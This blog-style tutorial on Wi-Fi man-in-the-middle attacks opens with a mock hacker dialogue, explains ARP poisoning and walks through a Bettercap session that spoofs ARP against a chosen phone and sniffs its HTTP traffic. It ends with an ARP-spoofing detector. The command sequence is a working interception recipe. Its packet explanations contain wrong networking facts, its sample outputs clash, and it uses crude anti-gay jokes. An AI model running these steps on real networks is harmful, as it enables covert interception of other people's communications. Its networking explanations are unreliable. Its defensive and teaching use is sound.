HACKER: You know, you've been walking around, thinking everything's fine, right? Your Wi-Fi's secure, your passwords are strong. You've got two-factor authentication turned on... so you think you're safe. But guess what? You've been living in the digital wild, thinking your encryption's your shield, while there's a sniper on the roof just waiting for the right moment.
YOU: What sniper? I have strong passwords.
HACKER: Cute. But those passwords? They're just data in transit. And guess what? Data doesn't stay where you think it does. Every time you connect to Wi-Fi, you've got a chance someone's watching you. Ever heard of a Man-in-the-Middle attack? No? Well, you're about to.
YOU: So someone's spying on my Wi-Fi?
HACKER: Not just spying. They're intercepting everything. Your emails, your private chats, your credit card info, your dumb cat memes. Everything is floating through the air like an open book. A book anyone with the right tools can read. And, trust me, they're reading it.
YOU: What do I do about it?
HACKER: Simple. You learn how to hack back. You don't sit idly by while your private data is out there. You sniff the airwaves, you intercept traffic, you see what they see. Only then can you understand the game being played on you. And when you see it... well, let's just say ignorance is no longer an option. Welcome to the real internet.
[ What is a MITM Attack? ]
You might think that what you do on your phone while lying on your bed—messaging your crush, posting memes to annoy people on Instagram—is private and safe. After all, it seems totally private, right? Well, that is until you realize someone with decent networking skills is connected to the same Wi-Fi network as you. Yes, they can actually see and read everything you do on your phone. Wait, what? Is my home network really that vulnerable? How the heck can they do that? Well, to answer your first question, it's not really considered a “vulnerability” because that's just how networking works. As for your second question—Welcome to the world of Man-in-the-Middle (MITM) attacks.
Imagine you're texting someone (maybe a low-budget hooker, or maybe a gay one, whatever works for you), and you're wondering how your message reaches the other person. Well, to understand that, we need to take a look at how your phone connects to Wi-Fi. Every device that connects to the internet—whether it's a phone, laptop, or PC—has a unique identifier called a MAC address. This is burned into the device's network card. When you connect to your home Wi-Fi, your router sees your MAC address and stores it in its memory. Every device connected to that same network has its own MAC address stored in the router, which helps the router know where to send data. So, when you send a message, for example, it travels through the air as data packets. I'll explain what these packets are and what they contain later. For now, know that your router receives these packets and knows they're coming from your device because it matches your MAC address. The router then sends it to the correct destination (like, say, the Telegram server where you're messaging your "special" someone). The same thing happens when your friend replies. His router gets the message, sees his MAC address, and sends it to his phone. This whole process happens very quickly, almost instantly.
Now, here's where MITM attackers get involved. They don't hack the messages directly; instead, they position themselves in between you and the server (or your “hooker,” in this case). The trick they use is something called ARP poisoning. Here's how it works: if a hacker is on the same Wi-Fi network, they can send your device forged ARP replies claiming that the router's IP address belongs to the hacker's MAC address, so your device starts handing its traffic to the hacker instead of the router. At the same time, they can send the router the same kind of false information, making it think that the hacker's MAC address is the device you're trying to communicate with. In short, when you send a message to your "hooker," the hacker can intercept it, read it, and even change it before passing it along. They basically become a "man in the middle" between you and the person you're messaging. And yes, they can see everything.
Now, before you get scared and think you're a target, let's look at how this actually works. And then we'll dive into ways you can protect yourself from this kind of attack. I'm going to demonstrate how we can sniff the network using Linux and a tool called Bettercap (don't worry, it works on Windows and macOS too, though the setup might differ). If you're not familiar with Bettercap, it's a powerful tool for sniffing and manipulating network traffic. In the next section, we'll walk through how to set up Bettercap, and later, we'll look at the security steps you can take to stop this kind of attack from happening to you.
[ What's inside the Packets? ]
So, when you're sending your steamy messages to your cheap gay hooker, those messages don't just travel over the network as one solid chunk. Instead, they get broken down into little packets. Each packet is like a tiny envelope containing part of your message.
The first part of the packet is the header, which is like the address on the envelope. It tells the router where the packet is going and who is sending it. The header contains the source address (your phone's MAC address), the destination address (the hooker's phone's MAC address), and the packet type (whether it’s a text, image, or meme). Imagine the packet's envelope has a label saying “Warning: Contains spicy content.”
Then, there's the payload, which is the juicy part of the packet, containing the actual data of your message. For instance, if you're texting “Wanna see a pic of my…”, only part of that sentence goes into one packet's payload. Other packets will carry the rest of your message, so it's all divided up.
Next, before these packets get sent, the sender computes something called a checksum, which acts like a security guard at the strip club, making sure everything is in order. The receiver recomputes the checksum to make sure the packet hasn't been corrupted or tampered with while traveling. If anything's wrong, the packet gets re-sent.
Finally, there's the footer, which is like the seal on the envelope. It marks the end of the packet and tells the network that it's done its job. So, when these packets reach the hooker's phone, they're reassembled back into your original message.
In the end, the message you sent is chopped up into little parts, packaged, checked, and sealed, and then reassembled perfectly on the other end, even though the packets may have traveled across different paths to get there. That is how your texts, or anything else you send, get delivered: broken into small packets and put back together at the destination.
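To make the envelope picture concrete, here is an added Python example (my own illustration, not code from the post or from Bettercap): it chops a message into Ethernet/IPv4 frames, stamps each one with source and destination MAC and IP addresses and a protocol number, seals it with the RFC 791 header checksum, and reassembles the payloads on the receiving side, refusing any frame whose checksum no longer adds up. The laptop and gateway addresses are the ones from this post's network; the server address 203.0.113.10 is a placeholder.

```python
import socket
import struct

# Constructed addresses: the laptop and gateway from the net.show table in the
# post, plus a placeholder server (203.0.113.10 is a documentation-only range).
MY_MAC, MY_IP = "d8:80:90:93:f4:55", "192.168.0.159"
GATEWAY_MAC = "58:c5:7e:dd:57:61"   # the envelope is addressed to the router's MAC
SERVER_IP = "203.0.113.10"

def ipv4_checksum(header: bytes) -> int:
    """RFC 791 checksum: one's-complement sum of the header's 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))
def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)

def build_frame(payload: bytes) -> bytes:
    """One 'envelope': Ethernet header + IPv4 header (protocol 6 = TCP) + payload."""
    eth = mac_bytes(GATEWAY_MAC) + mac_bytes(MY_MAC) + struct.pack("!H", 0x0800)
    # version/IHL, DSCP, total length, id, flags, TTL, protocol, checksum=0, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
                     64, 6, 0, socket.inet_aton(MY_IP), socket.inet_aton(SERVER_IP))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]   # seal it
    return eth + ip + payload

def split_into_frames(message: bytes, chunk: int) -> list:
    """Chop a message into packets carrying at most `chunk` payload bytes each."""
    return [build_frame(message[i:i + chunk]) for i in range(0, len(message), chunk)]

def parse_frame(frame: bytes) -> dict:
    """Read the 'address on the envelope' of an IPv4 frame and verify its checksum."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    ihl = (frame[14] & 0x0F) * 4                 # IPv4 header length in bytes
    ip_hdr = frame[14:14 + ihl]
    return {
        "dst_mac": mac_str(dst), "src_mac": mac_str(src), "ethertype": ethertype,
        "src_ip": socket.inet_ntoa(ip_hdr[12:16]), "dst_ip": socket.inet_ntoa(ip_hdr[16:20]),
        "protocol": ip_hdr[9],
        # summing a header together with its own checksum yields 0 when it is intact
        "checksum_ok": ipv4_checksum(ip_hdr) == 0,
        "payload": frame[14 + ihl:14 + struct.unpack("!H", ip_hdr[2:4])[0]],
    }

def reassemble(frames: list) -> bytes:
    """Glue the payloads back together, rejecting any frame whose checksum fails."""
    parts = []
    for frame in frames:
        info = parse_frame(frame)
        if not info["checksum_ok"]:
            raise ValueError("corrupted packet from %s" % info["src_ip"])
        parts.append(info["payload"])
    return b"".join(parts)
```

Flipping a single bit in any header field of a frame (for instance the source IP) is enough for parse_frame to report checksum_ok as False and for reassemble to reject the frame.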
[ Hands-on Experience with Bettercap ]
Let's dive into a hands-on experience with Bettercap for performing a man-in-the-middle attack. Before we start, remember that this should only be done on networks that you own or have explicit permission to test. Do not perform MITM attacks on public or unauthorized networks; it's illegal and unethical.
Installing Bettercap
Well, first things first, you need to install bettercap on your system. As I said earlier, this process varies based on your operating system, but here is a quick guide for Linux:
╭─ ~/Downloads 08:47:13 AM ─╮
╰─❯ sudo apt-get install bettercap ─╯
[sudo] password for guy:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
bettercap is already the newest version (2.32.0-1ubuntu0.22.04.3).
0 upgraded, 0 newly installed, 0 to remove and 2 not upgraded.
╭─ ~/Downloads 4s 08:47:24 AM ─╮
╰─❯
After you have installed it, you can double-check that Bettercap is correctly installed on your operating system by running this command:
╭─ ~/Downloads 4s 08:47:24 AM ─╮
╰─❯ bettercap --version ─╯
bettercap v2.32.0 (built for linux amd64 with go1.18.1)
╭─ ~/Downloads 08:49:21 AM ─╮
╰─❯
Running Bettercap
To run Bettercap, you need to pass a wireless interface as an argument along with the bettercap command. If you're using Linux, you can identify your wireless interface by typing the following command in your little cute terminal.
╭─ ~/Downloads 09:04:32 AM ─╮
╰─❯ ifconfig ─╯
enp2s0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 08:8f:c3:68:bd:2d txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 171132 bytes 1293743345 (1.2 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 171132 bytes 1293743345 (1.2 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlp3s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.159 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 2001:e68:544f:7c08:d8f3:170a:93ef:3a72 prefixlen 64 scopeid 0x0<global>
inet6 2001:e68:544f:7c08:12c4:3507:e3ca:18e5 prefixlen 64 scopeid 0x0<global>
inet6 fe80::f65b:7c08:e22e:8988 prefixlen 64 scopeid 0x20<link>
ether d8:80:90:93:f4:55 txqueuelen 1000 (Ethernet)
RX packets 1717108 bytes 2177660990 (2.1 GB)
RX errors 0 dropped 2 overruns 0 frame 0
TX packets 632855 bytes 99261212 (99.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╭─ ~/Downloads 09:04:33 AM ─╮
╰─❯
As you can see, when you execute this command you get a list of network interfaces on your computer. Look for the one that represents your Wi-Fi connection. Typically, it's named something like wlan0, wlp2s0, wlp3s0, or wlan1. This is the wireless interface your laptop or computer is using to connect to the network. Mine is wlp3s0, so I am gonna launch Bettercap by passing it as an argument.
╭─ ~/Downloads 09:08:42 AM ─╮
╰─❯ sudo bettercap --iface wlp3s0 ─╯
[sudo] password for guy:
bettercap v2.32.0 (built for linux amd64 with go1.18.1) [type 'help' for a list of commands]
192.168.0.0/24 > 192.168.0.159 » [09:08:48] [sys.log] [inf] gateway monitor started ...
192.168.0.0/24 > 192.168.0.159 »
After running the command, you'll notice that Bettercap is up and running. You'll see some information about the network interface and possibly some details about your network. Now, to see what kind of commands we can use in Bettercap, you can type the following command:
192.168.0.0/24 > 192.168.0.159 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
c2 > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
hid > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mdns.server > not running
mysql.server > not running
ndp.spoof > not running
net.probe > not running
net.recon > not running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
ui > not running
update > not running
wifi > not running
wol > not running
192.168.0.0/24 > 192.168.0.159 »
- arp.spoof: This module lets you perform ARP (Address Resolution Protocol) spoofing, where you trick devices into thinking you’re the router.
- net.probe: This scans the network to discover active devices.
- net.recon: This enables network reconnaissance, gathering juicy information about connected devices.
- net.sniff: This captures packets traveling on the network so you can inspect them.
Sniffing with Bettercap
To begin sniffing on our network, the first step is to enable the arp.spoof module. But before diving in, let's look at what commands and parameters the arp.spoof module offers. For this, we will use the following command in Bettercap.
192.168.0.0/24 > 192.168.0.159 » help arp.spoof
arp.spoof (not running): Keep spoofing selected hosts on the network.
arp.spoof on : Start ARP spoofer.
arp.ban on : Start ARP spoofer in ban mode, meaning the target(s) connectivity will not work.
arp.spoof off : Stop ARP spoofer.
arp.ban off : Stop ARP spoofer.
Parameters
arp.spoof.fullduplex : If true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail). (default=false)
arp.spoof.internal : If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the external network. (default=false)
arp.spoof.skip_restore : If set to true, targets arp cache wont be restored when spoofing is stopped. (default=false)
arp.spoof.targets : Comma separated list of IP addresses, MAC addresses or aliases to spoof, also supports nmap style IP ranges. (default=<entire subnet>)
arp.spoof.whitelist : Comma separated list of IP addresses, MAC addresses or aliases to skip while spoofing. (default=)
192.168.0.0/24 > 192.168.0.159 »
As you can see, there are some parameters we can set before enabling the arp.spoof module. The ones we are interested in are arp.spoof.fullduplex and arp.spoof.targets. Let's enable fullduplex first.
192.168.0.0/24 > 192.168.0.159 » set arp.spoof.fullduplex true
192.168.0.0/24 > 192.168.0.159 »
Now, before we set arp.spoof.targets, we have to know our target's IP address. To get that, we have to run another module called net.probe.
192.168.0.0/24 > 192.168.0.159 » net.probe on
192.168.0.0/24 > 192.168.0.159 » [09:47:18] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
192.168.0.0/24 > 192.168.0.159 » [09:47:18] [sys.log] [inf] net.probe probing 256 addresses on 192.168.0.0/24
192.168.0.0/24 > 192.168.0.159 » [09:47:18] [endpoint.new] endpoint 192.168.0.106 detected as 84:30:95:a2:0d:b6 (Hon Hai Precision IND.CO.,LTD).
192.168.0.0/24 > 192.168.0.159 » [09:47:19] [endpoint.new] endpoint 192.168.0.103 detected as 3a:79:66:8f:0c:c5.
192.168.0.0/24 > 192.168.0.159 » [09:47:20] [endpoint.new] endpoint 192.168.0.156 detected as fc:1d:2a:d6:16:45.
192.168.0.0/24 > 192.168.0.159 » [09:47:20] [endpoint.new] endpoint 192.168.0.157 detected as 90:2b:d2:a1:aa:9b (Huawei Technologies Co.,Ltd).
192.168.0.0/24 > 192.168.0.159 » [09:47:20] [endpoint.new] endpoint 192.168.0.100 detected as aa:ef:08:3f:0e:22.
192.168.0.0/24 > 192.168.0.159 »
192.168.0.0/24 > 192.168.0.159 » net.show
┌───────────────┬───────────────────┬─────────────────────────────────────────────┬────────────────────────────────┬────────┬────────┬──────────┐
│ IP ▴ │ MAC │ Name │ Vendor │ Sent │ Recvd │ Seen │
├───────────────┼───────────────────┼─────────────────────────────────────────────┼────────────────────────────────┼────────┼────────┼──────────┤
│ 192.168.0.159 │ d8:80:83:93:f4:55 │ wlp3s0 │ │ 0 B │ 0 B │ 09:08:48 │
│ 192.168.0.1 │ 58:c5:7e:dd:57:61 │ gateway │ │ 288 kB │ 128 kB │ 09:08:48 │
│ │ │ │ │ │ │ │
│ 192.168.0.101 │ aa:ef:08:3f:0e:22 │ │ │ 11 kB │ 28 kB │ 10:06:43 │
│ 192.168.0.100 │ 84:c7:ea:3f:3f:cb │ │ Sony Mobile Communications Inc │ 24 kB │ 5.3 kB │ 10:07:00 │
│ 192.168.0.103 │ 3a:79:66:8f:0c:c5 │ │ │ 57 kB │ 658 kB │ 10:06:56 │
│ 192.168.0.106 │ 84:30:95:a2:0d:b6 │ bf0f0103-558c-d7e9-cf7c-9f1ca8e67d2a.local. │ Hon Hai Precision IND.CO.,LTD │ 680 kB │ 478 kB │ 10:06:56 │
│ 192.168.0.156 │ fc:1d:2a:d6:16:45 │ │ │ 464 kB │ 335 kB │ 10:06:55 │
│ 192.168.0.157 │ 90:2b:d2:a1:aa:9b │ │ Huawei Technologies Co.,Ltd │ 101 MB │ 272 MB │ 10:06:59 │
└───────────────┴───────────────────┴─────────────────────────────────────────────┴────────────────────────────────┴────────┴────────┴──────────┘
↑ 2.6 MB / ↓ 388 MB / 847825 pkts
192.168.0.0/24 > 192.168.0.159 »
So now that I've got my Sony device's IP address, let's set our target using arp.spoof.targets. You can add multiple targets if you want by separating the IP addresses with commas.
192.168.0.0/24 > 192.168.0.159 » set arp.spoof.targets 192.168.0.100
192.168.0.0/24 > 192.168.0.159 »
Now that we have done all the steps required, we are ready to sniff the network. But before that, you need to know that sniffing the network produces a lot of unwanted information, and the terminal can become hard to read. So to prevent that, we are gonna filter the traffic so it only shows HTTP traffic.
192.168.0.0/24 > 192.168.0.159 » set net.sniff.filter "http"
192.168.0.0/24 > 192.168.0.159 »
192.168.0.0/24 > 192.168.0.159 » net.sniff on
192.168.0.0/24 > 192.168.0.159 »
POST /mmtls/4c7979d6 HTTP/1.1
Host: dns.wechat.com
Upgrade: mmtls
User-Agent: MicroMessenger Client
Accept: */*
Cache-Control: no-cache
Connection: close
Content-Length: 372
Content-Type: application/octet-stream
So, there you have it: an example of a packet we sniffed from the network. I know, it looks like a confusing mix of random stuff, and honestly, it's not exactly useful. But trust me, there were some spicy details in other packets that I had to hide because, well, privacy. (I'm not trying to get into trouble here!) What this really shows is just how much invisible chatter is flying around in your network. Some of it is boring, like "Hi, I'm just checking the connection," and some of it can be seriously revealing, like your search history. That's why securing your network is super important, unless you're okay with someone knowing how often you visit those juicy websites at 2 AM. Anyway, sniffing packets is a fun way to peek behind the curtain of how networks work. Just remember, this isn't a license to be a creep. Use tools like Bettercap responsibly, or you might end up explaining your internet habits to someone in a uniform. Stay curious but stay ethical!
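And since securing your network is the point, here is an added Python example (not part of the post, and not Bettercap code) of how a machine on the LAN can notice the ARP poisoning described above: it parses ARP replies, remembers the first IP-to-MAC binding it sees for each address, and raises an alert when the gateway's IP suddenly claims a different MAC, which is exactly what arp.spoof produces (with fullduplex, the victim's binding flips too). The frames are constructed inline from the addresses in the net.show table, with the wlp3s0 laptop playing the spoofer.

```python
import socket
import struct

ETH_ARP, ARP_REPLY = 0x0806, 2
GATEWAY_IP, GATEWAY_MAC = "192.168.0.1", "58:c5:7e:dd:57:61"   # from the net.show table
TARGET_IP, TARGET_MAC = "192.168.0.100", "84:c7:ea:3f:3f:cb"   # the Sony phone
SPOOFER_MAC = "d8:80:90:93:f4:55"                              # the wlp3s0 laptop

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))
def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Constructed Ethernet frame carrying the ARP reply 'sender_ip is at sender_mac'."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip, ethernet_source_mac), or None if not ARP."""
    _, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_ARP or len(frame) < 42:
        return None
    oper, sha, spa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])[4:7]
    return oper, mac_str(sha), socket.inet_ntoa(spa), mac_str(eth_src)

class ArpWatcher:
    """Remembers the first MAC seen for each IP and alerts when an IP 'moves'.
    arp.spoof makes the gateway IP appear at the attacker's MAC (fullduplex: the victim's too)."""
    def __init__(self, gateway_ip: str):
        self.gateway_ip = gateway_ip
        self.bindings = {}
    def observe(self, frame: bytes) -> list:
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        oper, sha, spa, eth_src = parsed
        alerts = []
        if sha != eth_src:   # ARP payload and Ethernet header disagree about the sender
            alerts.append("sender %s inside ARP differs from frame source %s" % (sha, eth_src))
        known = self.bindings.setdefault(spa, sha)   # baseline = first binding observed
        if known != sha:
            tag = "GATEWAY " if spa == self.gateway_ip else ""
            alerts.append("%s%s moved from %s to %s" % (tag, spa, known, sha))
        return alerts

def run_sample() -> list:
    """Replay a constructed sequence: two honest replies, then a fullduplex poisoning."""
    watcher = ArpWatcher(GATEWAY_IP)
    frames = [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, TARGET_MAC, TARGET_IP),   # honest
        build_arp_reply(TARGET_MAC, TARGET_IP, GATEWAY_MAC, GATEWAY_IP),   # honest
        build_arp_reply(SPOOFER_MAC, GATEWAY_IP, TARGET_MAC, TARGET_IP),   # "the router is me"
        build_arp_reply(SPOOFER_MAC, TARGET_IP, GATEWAY_MAC, GATEWAY_IP),  # "the phone is me"
    ]
    return [alert for frame in frames for alert in watcher.observe(frame)]
```

On a real host you would feed observe() frames read from a raw socket or a pcap, and seed the bindings from a moment when you trust the network (or from static ARP entries), so that a later "moved" alert is meaningful.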